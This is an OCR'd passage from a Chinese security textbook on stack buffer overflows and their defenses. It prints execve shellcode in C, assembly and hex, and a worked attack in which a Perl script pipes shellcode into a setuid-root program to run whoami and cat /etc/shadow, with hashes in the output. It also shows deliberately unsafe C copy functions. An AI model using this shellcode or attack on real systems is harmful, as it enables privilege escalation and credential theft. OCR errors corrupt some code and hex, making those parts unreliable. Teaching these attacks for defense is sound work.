用 了 不 安全 的 字符 串 操 作 函 数 。 在 C 语言 中 ， 一 个 字符 串 末 尾 经 常 有 一 个 NULL， 就 是 说 在 
shellcode 中 能 够 存在 NULL 的 唯一 地 方 是 在 未 尾 ， 在 所 有 代码 之 后 ， 这 样 这 个 字符 串 才能 改 
写 旧 的 帧 指针 ， 和 返回 地 址 的 值 。 

我 们 已 经 给 出 了 上 面 的 约束 条 件 ， 这 个 设计 过 程 产生 了 类 似 图 10-8b 中 的 代码 。 这 有 段 代码 
是 在 Pentium 处 理 器 上 使 用 x86 汇编 语言 9 编写 的 。 为 了 帮助 读者 阅读 这 段 代码 ， 表 10-3 提 
供 了 x86 汇编 语言 的 常用 指令 的 一 个 列表 ， 表 10-4 提供 了 常用 的 一 些 机 器 寄存 器 全 的 列 
表 。 关 于 x86 汇编 语言 和 机 器 的 组 织 结构 更 多 的 细节 可 以 查阅 文献 [STAL13]。 一 般 而 言 ， 
在 图 10-8b 中 的 代码 实现 了 图 10-8a 中 C 程序 的 功能 。 然 而 ， 为 了 克服 上 面 提 及 的 约束 条 件 ， 
还 有 几 个 特殊 的 问题 需要 解决 。 


表 10-3 一 些 常 用 的 x86 汇编 语言 指令 


MOV sre, dest 将 src 的 值 复制 到 dest 

LEA src, dest 将 sro 的 地 址 (装载 的 有 效 地 址 ) 复制 到 dest 
ADD/SUB src, dest 在 sre 中 加 / 减 去 dest 的 值 

AND/OR/XOR src, dest src 与 dest 逻辑 与 /或 / 异 或 运算 存 人 src, dest 值 不 变 
CMP vall,val2 比较 vall 和 val2， 将 CPU 的 flag 值 当 作 结 果 


O 编写 x86 汇编 语言 有 两 个 约定 : Intel 和 AT&T。 其 他 不 同 的 处 理 器 在 操作 上 使 用 了 完全 相反 的 次 序 。 本 章 中 
所 有 的 例子 都 使 用 了 AT&T 的 约定 ， 因 为 用 于 建立 这 些 例子 的 GNU GCC 编译 器 工具 接受 AT&T 的 约定 。 

© 目前 这 些 机 器 寄存 器 的 长 度 都 是 32 位 的 。 但 是 如 果 需 要 的 话 ， 可 以 将 一 些 寄存 器 当 作 16 位 寄存 器 (32 位 
中 的 低 16 位 ) 或 者 8 位 寄存 器 (相对 于 16 位 版 本 ) 使 用 。 
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JMP/JZ/INZ addr 
PUSH src 

POP dest 

CALL addr 
LEAVE 


RET 


INT num 


NOP 


32 位 
eax 
%ebx 
%ecx 
%edx 
%ebp 
%eip 
%esi 
%esp 


int main (int argc, char *argv[]) 
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表 10-4 


em | 5 位 1 高) | am 
累加 器 ， 用 于 算术 运算 、VO 操作 ， 以 及 执行 中 断 调用 

基本 寄存 器 ， 用 于 访问 内 存 ， 传 递 系统 调用 的 参数 和 返回 值 
ic aa 

| %dx | %dh | (dl | 数据 寄存 器 ,用 于 算术 操作 、 中 断 调用 和 IO 操作 

| | ”下 ee A RR 

| | | | 指令 指针 或 者 程序 计数 器 ， 包 含 下 一 条 将 要 执行 的 指令 的 地 址 
| | ”| | 源 索 引 寄 存 器 ， 当 作 一 个 操作 字符 申 或 数组 的 指针 来 使 用 

[| | | -| 起 指针 ,包含 本 顶部 的 地 址 


char *sh; 
char *args[2]; 


sh = "/bin/sh; 
args(0] = sh; 

args [1] = NULL; 
execve (sh, args, NULL); 


mov 
mov 
mov 
lea 
lea 
int 





( 续 ) 
跳 转 〈 无 条 件 / 如 果 为 零 / 如 果 不 为 零 ) 到 addr 
将 sro 的 值 压 入 栈 
将 位 于 栈 顶 部 的 数值 弹出 到 dest 
在 addr 处 调用 函数 
在 退出 函数 之 前 清除 栈 帧 
从 函数 返回 
软件 中 断 访问 操作 系统 函数 
不 操作 或 不 执行 任何 指令 


一 些 x86 寄存 器 


用 法 





a) 在 C 语 言 中 的 shellckde 代 码 


find 

%esi 

%eax, Yeax 
tal, 0x7(tesi) 
(%esi), tebx 
%ebx, 0x8 (tesi) 
teax, Oxc (tesi) 
$0xb, tal 

tesi, tebx 

0x8 (%esi) , tecx 
Oxc (esi) , tedx 
$0x80 


find: call cont 
sh: .String "/bin/sh " 
args: .long 0 

-long 0 


//end of nop sled 


//jump 


to end of code 


//pop address of sh off stack into tesi 


//zero 
//copy 
//load 
//save 
//copy 
{icopy 
//copy 
//copy 
//copy 


contents of EAX 

zero byte to end of string sh (tesi) 
address of sh (tesi) into tebx 
address of sh in args [0] (tesi+8) 
zero to args [1] (%esi+c) 

execve syscall number (11) to AL 
address of sh (tesi) into tebx 
address of args (tesi+8) to tecx 
address of args[1] (tesi+c) to tedx 


// software interrupt to execute syscall 


//call 


cont which saves next address on stack 


//string constant 
//space used for args array 
//args[1] and also NULL for env array 





b) 等 价 的 浮动 地 址 的 x86 汇 编 代 码 


90 90 eb la Se 31 cO 88 46 07 Bd le 89 Se 08 89 
46 Oc bO Ob 89 £3 8d 4e 08 8d 56 Oc cd 80 e8 el 


ff ff ff 2f 62 69 6e 2f 73 68 20 20 20 20 20 20 





c) 编译 过 的 x86 机 器 代码 的 十 六 进 制 值 
图 10-8 UNIX 的 shellcode 示例 
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首要 的 问题 是 字符 串 “ /bin/sh ”是 如 何 被 引用 的 。 当 默认 编译 时 ， 这 个 字符 串 是 被 假设 为 
程序 全 局 数据 区 的 一 部 分 被 编译 的 。 但 是 要 想 在 shellcode 中 使 用 ， 这 个 字符 串 就 必须 与 指令 
包含 在 一 起 ， 通 常 把 它 设置 在 指令 之 后 。 接 着 为 了 引用 这 个 字符 串 ， 代 码 还 必须 确定 它 被 设置 
的 相对 于 当前 指令 地 址 的 地 址 ， 这 可 以 通过 使 用 一 个 新 的 非 标准 的 CALL 指令 实现 。 当 执行 
一 个 CALL 指令 时 ， 它 在 栈 中 随 之 立即 压 人 一 个 内 存 存 储 单元 的 地 址 。 当 被 调用 的 函数 返回 
时 ， 这 个 地 址 将 会 作为 返回 地 址 被 正常 地 使 用 。 在 一 个 巧妙 的 骗局 中 ，shellcode 跳 转 到 代码 段 
的 末尾 常量 数据 〈 例 如 “bin/sh”) 之 前 的 一 个 CALL 指令 ， 并 且 在 跳 转 之 后 ， 紧 接着 调用 返 
回 到 一 个 存储 单元 。 不 是 用 CALL 指令 压 人 到 栈 的 地 址 作为 返回 地 址 ， 而 是 从 栈 中 弹出 这 个 
地 址 放 到 %esi 寄存 器 中 当 作 常 量 数据 的 地 址 使 用 。 无 论 代码 被 设置 在 内 存 中 什么 位 置 ， 这 种 
技术 都 能 成 功 。shellcode 中 使 用 的 其 他 局 部 变量 的 地 址 空间 将 会 随 着 这 个 常量 字符 串 设 置 ， 通 
过 这 个 相同 的 动态 确定 的 地 址 的 偏 移 量 也 可 以 引用 这 些 局 部 变量 。 

下 一 个 问题 是 确保 shellcode 中 没有 NULL。 这 就 是 说 0 值 不 能 在 任何 指令 参数 或 者 任何 
常量 数据 (例如 ， 字 符 串 “/bin/sh” 未 尾 存储 的 NULL) 中 使 用 。 当 代码 运行 的 时 候 任 何 需要 
的 0 值 必须 被 产生 和 存储 。 一 个 寄存 器 的 值 与 它 自 己 进行 逻辑 异 或 运算 (XOR) 可 以 产生 一 个 
0 值 ， 在 这 里 使 用 的 是 寄存 器 %eax。 接 着 这 个 值 能 够 被 复制 到 任何 需要 的 地 方 ， 例 如 这 个 字 
符 串 的 末尾 ， 也 可 以 被 当 作 参数 arg[1] 的 值 。 

为 了 解决 不 能 准确 确定 这 个 代码 段 的 初始 地 址 的 问题 ， 攻 击 者 能 够 利用 这 样 一 个 事实 : 代 
码 的 长 度 常常 比 缓冲 区 的 有 效 地 址 空间 (这 个 例子 中 是 40 个 字 节 长 ) 短 很 多 。 通 过 在 缓冲 区 
的 末尾 附近 放置 这 些 代码 ， 攻 击 者 能 够 用 多 个 NOP 指令 填充 缓冲 区 前 面 的 空间 。 因 为 这 些 指 
令 什 么 也 不 做 ， 攻 击 者 能 够 指定 进入 这 段 代码 使 用 的 返回 地 址 ， 作 为 NOP 指令 这 次 运行 的 存 
储 单元 ， 这 被 称 作 一 次 NOP sled。 如 果 指 定 的 地 址 大 约 是 在 NOP sled 的 中 部 ， 那 么 攻击 者 就 
能 确定 NOP sled 一 半 的 长 度 与 实际 的 缓冲 区 地 址 不 同 ， 但 攻击 者 还 是 可 以 成 功 的 。 无 论 实 际 
的 目标 地 址 在 NOP sled 中 的 什么 地 方 ， 计 算 机 总 能 通过 维持 NOP 运行 ， 不 做 任何 操作 ， 直 到 
找到 真正 的 shellcode 的 起 始 地 址 。 

在 这 个 背景 之 下 ， 你 现在 能 够 通过 图 10-8b 中 列 出 的 用 汇编 语言 编写 的 shellcode 进行 追 
踪 。 简 单 地 说 ， 这 段 代码 : 

o 使 用 指令 JMP/CALL 确定 常量 字符 串 的 地 址 。 

© 使 %eax 的 内 容 为 0， 并 复制 这 个 值 到 常量 字符 串 的 末尾 。 

o 在 args[0] 里 保存 那个 字符 串 的 地 址 。 

o 使 args[1] 的 值 为 0。 

e 为 系统 调用 配置 参数 : 

n 系统 调用 execve 的 代码 数目 (11 )。 

a 字符 串 的 地 址 作为 程序 名 被 装载 。 

m 数组 args 的 地 址 作为 参数 列表 。 

m args[1] 的 地 址 ， 因 为 它 是 NULL， 可 作为 ( 空 的 ) 环境 列表 。 

e 产生 一 个 软件 中 断 执 行 这 个 系统 调用 (永远 不 返回 )。 

当 这 段 代 码 被 汇编 的 时 候 ， 其 机 器 代码 的 十 六 进 制 形式 如 图 10-8c 所 示 。 其 中 包括 在 前 面 的 一 
对 NOP 指令 (在 需要 的 时 候 为 NOP sled 产生 )， 在 末尾 (因为 NULL 不 能 使 用 ， 当 它 运 行 的 时 
候 代码 将 要 写 人 需要 的 数值 ) 对 局 部 变量 用 ASCII 码 的 空格 代替 了 0 值 。 这 段 shellcode 形成 
了 攻击 字符 串 的 核心 。 为 了 产生 一 些 特殊 的 漏洞 程序 ， 现 在 还 必须 要 对 它 进 行 改编 。 

一 个 栈 溢 出 攻击 的 示例 ”现在 我 们 已 经 掌握 了 需要 理解 缓冲 区 溢出 的 所 有 的 概念 。 为 了 说 
明 这 样 的 一 个 攻击 是 如 何 实际 执行 的 ， 我 们 使 用 一 个 在 图 10-5a 的 基础 上 改编 的 目标 程序 。 修 
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改 以 后 的 程序 缓冲 区 的 长 度 增加 到 64 (为 我 们 的 shellcode 提供 足够 的 空间 )， 没 有 非 缓冲 的 输 

人 (这 样 当 Bourne shell 启动 的 时 候 不 会 丢掉 任何 值 )， 并 且 被 设置 为 setuid root。 这 就 是 说 当 

它 运行 的 时 候 ， 程 序 是 以 超级 用 户 或 者 系统 管理 员 的 特权 执行 ， 完 全 地 访问 系统 。 这 模拟 了 一 

种 攻击 : 一 个 人 侵 者 像 一 个 正常 的 用 户 一 样 获得 访问 一 些 系统 的 权限 ， 并 且 和 希望 在 一 个 可 信和 的 
， 实 用 程序 中 利用 一 个 缓冲 区 溢出 ， 以 此 获取 最 大 的 特权 。 

使 用 一 个 适合 的 、 有 漏洞 的 、 受 信任 的 实用 程序 ， 攻 击 者 开始 分 析 确 定 栈 中 目标 缓冲 区 
的 大 概 位 置 ， 以 及 需要 多 长 的 数据 达到 并 且 溢 出 旧 的 栈 指 针 和 栈 蚌 中 的 返回 地 址 。 为 了 做 到 这 
些 ， 攻 击 者 在 一 个 正在 成 为 目标 的 相同 类 型 的 系统 上 使 用 一 个 调试 器 运行 目标 程序 。 可 以 用 
很 多 的 随机 输入 使 程序 出 涡 ， 接 着 在 core dump 中 使 用 调试 器 ; 也 可 以 在 调试 器 的 控制 下 利用 
目标 函数 里 的 一 个 断 点 运行 程序 。 通 过 这 两 种 方式 攻击 者 确定 这 个 函数 栈 帧 的 一 个 通常 的 位 

356) ” 置 。 当 我 们 使 用 这 个 程序 示例 去 执行 时 ,缓冲 区 inp 的 起 始 地 址 为 0xbffffbb0， 当 前 的 帧 指针 
(在 %ebp 里) 是 0xbffffe08， 在 这 个 地 址 保存 的 帧 指针 是 0xbffffc38。 这 就 是 说 要 填 满 缓冲 区 到 
达 保 存 的 帧 指针 需要 0x58 或 者 88 个 字 节 。 首 先 允 许 末尾 少数 空格 提供 给 数组 args， 在 开始 的 
时 候 NOP sled 不 断 扩展 滑行 ， 直 到 准确 使 用 88 个 字 节 ， 新 的 栈 指针 值 保 留 原 来 的 0xbffffc38， 
目标 的 返回 地 址 值 被 设置 成 0xbffffc08， 这 个 值 在 NOP sled 的 中 间 位 置 。 下 一 步 必 须 有 一 个 新 
行 符 结束 这 个 〈 过 长 的 ) 输入 行 ， 该 行将 要 通过 gets) 读 人 。 这 次 给 出 了 总 共 97 个 字 节 ， 我 们 
再 一 次 使 用 一 个 小 Perl 程序 将 十 六 进 制 表示 的 攻击 字符 串 转换 成 二 进 制 ， 实 现 这 次 攻击 。 

一 旦 攻击 成 功 ， 攻 击 者 也 必须 指定 命令 并 通过 shell 运行 。 这 些 命令 必须 编写 到 目标 程序 
中 ， 因 为 启动 的 Bourne shell 从 相同 的 标准 输入 中 读 取 这 些 内 容 替 代 程 序 。 在 这 个 例子 中 , 我 
们 将 运行 两 个 UNIX 命令 : 

1. whoami 显示 用 户 的 身份 ， 他 的 特权 当前 正在 使 用 。 ; 

2. cat /etc/shadow 显示 隐藏 的 口令 文件 password file) 的 内 容 ， 这 个 文件 保存 了 用 户 的 加 
密 口令 ， 仅 超级 用 户 可 以 访问 它 。 

图 10-9 显示 这 次 攻击 正在 进行 。 首先， 针对 目标 程序 buffers 的 一 个 目录 列表 显示 这 个 程 
序 的 所 有 者 是 root 用 户 ， 同 时 它 是 一 个 setuid 程序 。 接 着 当 直 接 运 行 目标 命令 的 时 候 ， 当 前 的 
用 户 被 指定 为 knoppix， 这 个 用 户 没 有 足够 的 特权 访问 隐藏 的 口令 文件 。 接 下 来 显示 了 脚本 攻 
击 的 内 容 ， 它 包含 的 Perl 程序 首先 进行 编码 ， 然 后 输出 shellcode， 接 着 输出 期 望 的 shell 命令 ， 
最 后 ， 看 到 通过 管道 输出 到 目标 程序 里 的 结果 。 读 人 的 输入 行 像 多 个 垃圾 字符 (在 这 个 列表 中 
已 经 被 截 短 ， 尽 管 如 此 ， 仍 能 看 到 里 面包 含 字符 串 /bin/sh) 显示 。 接 着 从 命令 whoami 的 输出 
显示 ，shell 实际 是 用 root 权限 在 运行 ， 这 就 是 说 隐藏 的 口令 文件 可 以 被 读 取 ， 正 如 我 们 看 到 
的 (也 已 经 被 截 短 了 ) 那样 。 我 们 可 以 看 到 用 户 root 和 knoppix 的 加 密 口 令 ， 用 一 个 密码 破解 
程序 就 可 以 确定 真正 的 口令 。 我 们 的 攻击 已 经 成 功 获 取 了 目标 系统 上 的 超级 用 户 权限 ， 利 用 它 
能 够 运行 任何 希望 的 命令 。 

这 个 例子 模拟 了 对 系统 上 的 一 个 本 地 漏洞 的 攻击 ， 它 能 够 使 攻击 者 逐步 获取 特权 。 实 际 
上 ,缓冲 区 很 可 能 很 大 (通常 的 长 度 是 1024B)， 这 就 意味 着 NOP sled 相对 也 很 大 ， 因 此 猜测 
的 目标 地 址 不 需要 准确 。 实 际 上 一 个 目标 工具 也 可 能 使 用 缓冲 的 输入 而 不 是 非 缓 冲 的 输入 ， 这 
就 意味 着 输入 库 函 数 已 经 提前 读 取 了 一 定数 量 的 字符 ， 超 出 了 程序 请 求 的 范围 。 然 而 ， 当 调用 
函数 execve ("/bin/sh") 时 ， 这 个 缓冲 的 输入 已 经 被 丢弃 了 ， 这 样 攻击 者 需要 用 足够 的 空 行 (一 
般 约 1000+ 字符 ) 填充 输入 发 送 给 程序 ， 所 以 希望 被 执行 的 shell 命令 没有 包含 在 这 些 被 丢弃 
的 缓冲 区 内 容 里 。 这 是 很 容易 完成 的 (只 是 在 Perl 程序 里 有 一 打 或 更 多 的 print 语句 )， 但 是 这 

B5) 会 让 这 个 例子 越 来 越 庞 大 ,缺乏 清晰 感 。 


ZlOe BARR 255 


$ dir -1 buffer4 
-rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4 


$ whoami 

knoppix 

$ cat /etc/shadow 

cat: /etc/shadow: Permission denied 


$ cat attackl 

perl -e 'print pack("H*", 
"90909090909090909090909090909090" . 
"90909090909090909090909090909090" . 
"9090eb1a5e31c08846078dle895e0889" . 
"460cb00b89f38d4e088d560ccd80e8el" . 
"f££LELL2£62696e2£7368202020202020" . 
"202020202020202038fcffbfcOfbffbf0a") ; 
print "whoami\n"; 

print "cat /etc/shadow\n";' 


$ attack1 | buffer4 

Enter value for name: Hello your yyy)DAOQApy is e?*1AFF.../bin/sh... 
root 

root :$1$rNLI1d4rx$nka7J1xH7.4UJT419J3RLk1:13346:0:99999:7::: 

daemon: *:11453:0:99999:7::: 


nobody: *:11453:0:99999:7::: 
knoppix : $1$FvZSBKBu$EdSFvuuJdKaCH8YOIdnAv/ :13346:0:99999:7::: 





图 10-9 栈 溢 出 攻击 示例 


目标 程序 不 必 非 得 是 一 个 受信 任 的 系统 工具 ， 也 可 能 是 一 个 提供 网 络 服务 的 程序 ， 即 网 
络 守护 进程 (network daemon)。 这 些 程序 的 常用 方法 是 监听 来 自 客户 端的 连接 请 求 ， 接 着 产 
生 一 个 子 进程 处 理 这 个 请 求 。 这 个 子 进 程 一 般 把 网 络 连接 映射 到 它 的 标准 输入 和 输出 ， 就 像 我 
们 已 经 看 到 的 那样 ， 子 程序 的 代码 可 以 使 用 相同 类 型 的 不 安全 的 输入 或 者 缓冲 区 复制 代码 。 这 
是 1988 年 末 Morris 蠕虫 使 用 的 栈 缓冲 区 溢出 攻击 的 真实 情形 ， 它 是 以 在 fingerd 中 使 用 函数 
gets() 处 理 UNIX finger 网 络 服务 (在 系统 上 提供 与 用 户 相关 的 信息 ) 的 请 求 作为 目标 。 

另 一 个 可 能 的 目标 是 处 理 常用 文档 格式 〈 例 如， 使 用 库 例 程 解码 并 显示 GIF 或 者 JPEG 图 
像 ) 的 程序 或 者 库 代 码 。 在 这 种 情形 下 ， 输 入 不 是 来 自 于 一 个 终端 或 者 网 络 连接 ， 而 是 来 自 于 
被 解码 和 显示 的 文件 。 如 果 这 些 代码 包含 缓冲 区 溢出 ， 当 读 取 文 件 内 容 的 时 候 ， 在 一 个 特殊 
的 被 破坏 的 图 像 里 进行 解码 能 够 触发 缓冲 区 溢出 。 这 种 攻击 文件 可 能 经 由 电子 邮件 、 即 时 信 
息 或 者 作为 Web 页 的 一 部 分 进行 散布 。 因 为 攻击 者 不 是 直接 与 目标 程序 和 系统 进行 交互 ， 故 
shellcode 通常 打开 一 个 网 络 连接 ， 并 退回 到 一 个 攻击 者 控制 的 系统 ， 返 回信 息 并 可 能 接收 额外 
的 命令 来 执行 。 所 有 这 些 都 表明 在 许多 类 型 的 程序 中 都 能 发 现 缓冲 区 溢出 ， 它 们 处 理 一 系列 不 
同 的 输入 ， 并 产生 各 种 可 能 的 响应 。 

上 述 描述 说 明 在 栈 溢出 攻击 中 进行 shellcode 开发 和 配置 是 很 简单 的 。 除 了 启动 一 个 命令 
行 (UNIX 或 者 DOS) shell 以 外 ， 攻 击 者 还 可 能 企图 让 其 shellcode 完成 一 些 更 复杂 的 操作 ， 正 
如 在 已 经 讨论 过 的 情况 下 指出 的 那样 。Metasploit 项 目 站 点 包含 了 能 够 产生 的 shellcode 的 一 系 
列 功能 ， 口 袋 风 暴 (Packet Storm) Web 站 点 包含 了 很 多 已 打包 的 shellcode， 包 含 的 代码 能 够 : 

e 被 连接 的 时 候 建 立 一 个 侦 听 服务 启动 一 个 远程 shell。 

e 建立 一 个 相反 的 shell， 反 向 连接 到 黑客 系统 。 

© 使 用 本 地 攻击 ， 创 建 一 个 shell 或 者 execve 一 个 进程 。 

© 上 废除 当前 阻止 其 他 攻击 的 防火 墙 规则 (例如 IPTables 和 PChains ) 。 
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o 摆脱 chrooted (限制 执行 ) 的 环境 ， 对 系统 进行 完全 访问 。 
在 各 种 平台 上 就 一 系列 可 能 的 结果 编写 shellcode 过 程 的 更 多 细节 能 够 在 [ANLE07] 中 找到 。 


10.2 ”针对 缓冲 区 溢出 的 防御 


我 们 已 经 看 到 ， 发 现 和 利用 栈 缓冲 区 溢出 进行 攻击 并 不 困难 。 在 过 去 的 20 年， 相当 多 的 
漏洞 攻击 程序 已 经 有 力 地 说 明了 这 一 点 。 针 对 这 些 攻击 就 有 了 防护 系统 的 需求 ， 我 们 希望 能 够 
预防 它们 发 生 ， 或 者 至 少 也 可 以 检测 到 和 终止 它们 。 这 一 节 我 们 讨论 一 些 可 能 的 方法 实现 对 系 
统 的 保护 ， 这 些 方法 大 致 可 以 划分 为 两 类 ; 

o 编译 时 防御 ， 目 标 是 加 固 程 序 来 抵抗 在 新 程序 中 的 攻击 。 

o 运行 时 防御 ， 目 标 是 在 现 有 的 程序 中 检测 和 终止 攻击 。 

尽管 在 过 去 的 20 多 年 里 ， 人 们 已 经 发 现 了 很 多 合适 的 防御 措施 ， 然 而 许多 软件 和 系统 存 
在 漏洞 的 事实 阻碍 了 这 些 防御 措施 的 施行 。 因 此 ， 运 行 时 防御 如 今 更 受 青睐 ， 因 为 其 能 够 在 操 
作 系 统 和 升级 系统 中 进行 配置 ， 从 而 对 存在 漏洞 的 程序 提供 保护 。 这 方面 大 多 数 的 技术 可 以 参 
考 [LHCEE03]。 


10.2.1 编译 时 防御 


编译 时 防御 ， 是 指 在 进行 编译 的 时 候 通 过 检测 程序 防止 或 侦 测 缓冲 区 溢出 。 完 成 该 防御 
的 方法 有 选择 一 种 不 允许 缓冲 区 溢出 的 高 级 语言 ， 鼓 励 使 用 安全 的 编码 标准 ， 使 用 安全 的 标准 
库 , 或 者 包含 用 来 检测 栈 帧 是 否 被 破坏 的 附加 代码 。 

程序 设计 语言 的 选择 ”如 前 所 述 ， 一 个 选择 是 使 用 一 种 现代 高 级 程序 语言 编写 程序 ， 它 对 
变量 类 型 和 在 其 上 可 进行 的 操作 有 较 强 的 概念 。 这 样 的 语言 不 容易 受到 缓冲 区 溢出 的 攻击 ， 因 
为 它们 的 编译 器 包含 附加 的 代码 自动 加 强 范 围 检 查 ， 不 需要 程序 员 在 编码 中 进行 明确 的 说 明 。 
这 些 语言 提供 的 灵活 性 和 安全 机 制 ， 在 资源 使 用 上 会 付出 一 定 的 代价 ， 包 括 在 编译 和 运行 时 必 
须 执 行 附 加 代码 〈 例 如 对 缓冲 区 进行 限制 的 代码 )， 以 此 加 强 检查 。 由 于 处 理 器 性 能 的 快速 增 
长 ， 这 些 不 利 条 件 变 得 越 来 越 不 重要 。 越 来 越 多 的 程序 使 用 这 些 语言 进行 编写 ， 因 此 这 些 程序 
代码 对 缓冲 区 溢出 具有 免疫 能 力 〈 但 是 如 果 它 们 在 缺乏 安全 机 制 的 语言 里 使 用 已 有 的 系统 库 ， 
或 者 进行 运行 时 执行 环境 的 编写 ， 它 们 还 是 容易 受到 攻击 的 )。 我 们 也 注意 到 ， 距 离 底 层 的 机 
器 语言 和 结构 越 远 ， 就 意味 着 访问 一 些 指令 和 硬件 资源 越 不 可 能 。 这 就 限制 了 在 编写 代码 时 它 
们 的 有 效 性 ， 例 如 ， 编 写 设备 驱动 程序 ， 必 须 与 这 些 底层 资源 进行 交互 。 由 于 这 些 原因 ， 仍 然 
可 能 至 少 有 一 些 代码 需要 使 用 缺乏 安全 机 制 的 语言 来 编写 ， 例 如 C 语言 。 

安全 的 编码 技术 ”如果 使 用 像 C 语言 一 类 的 语言 ， 程 序 员 必须 意识 到 处 理 指针 地 址 以 及 
直接 访问 内 存 需要 付出 一 定 的 代价 。 我 们 已 经 注意 到 ，C 语言 是 作为 系统 编程 语言 被 设计 的 ， 
它 运 行 在 比 我 们 现在 使 用 的 小 得 多 且 受 限 得 多 的 系统 上 。 这 就 意味 着 ， 与 类 型 安全 相 比 ，C 语 
言 的 设计 者 更 多 地 强调 空间 的 效率 和 性 能 ， 设 计 者 们 假设 程序 员 在 使 用 这 些 语言 编写 代码 时 是 
非常 细心 的 ， 他 们 有 责任 确保 所 有 数据 结构 和 变量 的 安全 使 用 。 

不 幸 的 是 ， 正 如 几 十 年 的 经 历 表明 的 那样 ， 实 际 的 情况 并 不 是 这 样 。 由 于 UNIX 操作 系 
统 、Linux 操作 系统 和 应 用 程序 中 庞大 的 继承 代码 体 包 含 潜 在 的 不 安全 代码 ， 因 此 它们 很 容易 
受到 缓冲 区 滋 出 的 攻击 。 

为 了 加 固 这 些 系统 ， 程 序 员 必 须 检查 代码 ， 以 一 种 安全 的 方式 重新 编写 任何 不 安全 的 代 
码 。 对 缓冲 区 溢出 的 攻击 要 给 予 快速 的 反击 ， 在 某 种 程度 上 这 个 进程 已 经 开始 。OpenBSD 项 
目 是 一 个 很 好 的 典范 ， 它 产生 了 一 个 自由 的 多 平台 的 基于 4.4BSD 的 类 UNIX ( UNIX-like) 操 
作 系 统 。 在 这 个 系统 中 其 他 技术 改变 了 ， 程 序 员 对 已 有 的 代码 基底 (code base) 进行 了 广泛 的 
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审计 ， 这 些 代码 包括 操作 系统 、 标 准 库 和 常用 工具 。 这 使 得 人 们 普遍 认为 该 操作 系统 是 广泛 使 
用 的 最 安全 的 操作 系统 。OpenBSD 项 目 声称 ， 到 2006 年 中 期 ，8 年 多 来 在 默认 安装 的 系统 中 
仅 发 现 一 个 远程 漏洞 ， 这 是 一 个 让 人 羡慕 的 记录 。 微 软 的 程序 员 也 承担 了 一 个 主要 的 项 目 ， 审 
查 他 们 的 代码 基底 。 其 部 分 目的 是 对 大 量 漏洞 引起 的 不 断 恶 化 的 宣传 进行 回应 。 这 些 漏洞 包括 
在 其 操作 系统 和 应 用 代码 中 发 现 的 很 多 缓冲 区 溢出 问题 ， 这 显然 是 一 个 困难 的 过 程 ， 尽 管 他 们 
声称 新 的 操作 系统 Vista 将 会 从 这 个 过 程 中 大 为 受益 。 

关于 程序 员 为 了 完成 他 们 自己 的 程序 继续 编写 程序 代码 ， 保 证 不 发 生 缓冲 区 溢出 需要 的 
训练 ， 是 我 们 在 第 11 章 讨论 的 各 种 安全 程序 设计 技术 的 一 部 分 。 更 明确 地 说 ， 这 意味 着 一 种 
心态 : 编码 不 只 是 为 了 成 功 ,或 者 为 了 预期 的 成 果 ; 要 经 常 意识 到 事情 可 能 已 经 误 入 歧途 ， 编 
码 完全 错误 ， 当 不 希望 的 事情 发 生 时 总 能 明智 地 处 理 。 再 明确 地 说 ， 在 防止 缓冲 区 溢出 的 情况 
下 ， 这 也 意味 着 程序 员 一 定 要 确保 写 到 缓冲 区 的 代码 首先 要 接受 检查 ， 保 证 有 充足 的 有 效 空间 
可 以 使 用 。 在 本 章 前 面 的 例子 中 我 们 强调 了 使 用 库 例 程 的 问题 ， 例 如 使 用 库 例 程 gets0， 也 强 
调 了 对 字符 串 数据 的 输入 和 处 理 的 问题 。 当 然 并 不 限于 这 些 情况 。 有 时 很 有 可 能 发 生 这 样 的 情 
况 ， 编 写 显而易见 的 代码 在 一 种 不 安全 的 方式 下 移动 一 些 值 。 图 10-10a 中 显示 一 个 不 安全 的 
字 节 复制 函数 ， 这 段 代码 从 数组 from 的 起 始 位 置 复制 len 个 字 节 到 数组 to 中 ， 从 数组 to 的 第 
pos 位 置 开始 ， 最 后 返回 数组 to 复制 结束 的 位 置 。 不 幸 的 是 ， 这 个 函数 对 目标 缓冲 区 to 的 实 
际 长 度 没有 给 出 任何 信息 ， 因 此 没有 人 能 保证 缓冲 区 溢出 不 会 发 生 。 在 这 种 情形 下 ， 调 用 的 代 
码 应 该 保证 sizetlen 的 值 没有 数组 to 的 长 度 大 。 这 也 说 明了 输入 值 不 一 定 必须 是 一 个 字符 串 ， 
它 可 以 仅 是 简单 的 二 进 制 数据 ， 正 如 误 操 作 那 样 。 图 10-10b 中 显示 一 个 不 安全 的 字 节 输入 函 
数 ， 它 读 取 希 望 的 二 进 制 数据 的 长 度 ， 并 且 接 着 读 取 这 个 长 度 的 字 节 到 目标 缓冲 区 。 问 题 还 是 
在 代码 中 没有 给 出 目标 缓冲 区 长 度 的 任何 信息 ， 因 此 还 是 不 能 检查 是 否 可 能 出 现 缓冲 区 溢出 。 
这 些 例证 既 强 调 了 需要 一 直 检 验 正在 使 用 的 空间 大 小 ， 又 强调 了 使 用 简单 的 C 语言 代码 、 调 
用 标准 库 例 程 能 够 发 生 缓 冲 区 溢出 的 事实 。 使 用 C 语言 ， 它 的 数组 和 指针 的 符号 几乎 是 相同 
的 ， 但 是 在 使 用 上 又 有 轻微 的 差别 ， 这 就 引起 了 更 复杂 的 问题 。 特 别 地 ， 指 针 运 算 和 随后 的 解 
引用 (dereferencing， 即 找到 指针 所 指向 的 内 容 ) 能 够 导致 访问 超出 已 经 分 配 的 变量 空间 ， 但 
是 这 是 在 不 甚 明 显 的 方式 之 下 。 在 编写 这 种 结构 的 代码 时 一 定 要 特别 细心 。 


int copy_buf(char *to, int pos, char *from, int len) 


int i; 


for (i=0; i<len; i++) { 
to [pos] = from[i); 
pos++; 


return pos; 





a) 不 安全 的 字 节 复制 
short read_chunk(FILE fil, char *to) 
{ 
short len; 


fread(&len, 2, 1, fil); /* read length of binary data */ 
fread(to, 1, len, fil); /* read len bytes of binary data 


return len; 


} 





b) 不 安全 的 字 节 输入 
图 10-10 不 安全 的 C 语言 代码 实例 
语言 扩充 和 安全 库 的 使 用 在 C 语言 里 使 用 不 安全 的 数组 和 指针 引用 ， 就 会 发 生 问题 。 


针对 这 些 问 题 人 们 给 出 了 很 多 增强 编译 器 功能 的 建议 ， 即 在 这 些 引 用 中 自动 插入 范围 检查 。 对 
静态 分 配 的 数组 来 说 这 是 相当 容易 实现 的 ， 然 而 处 理 动态 内 存 分 配 就 要 复杂 得 多 ， 因 为 在 编译 


258 — 2B BHREITH RA 


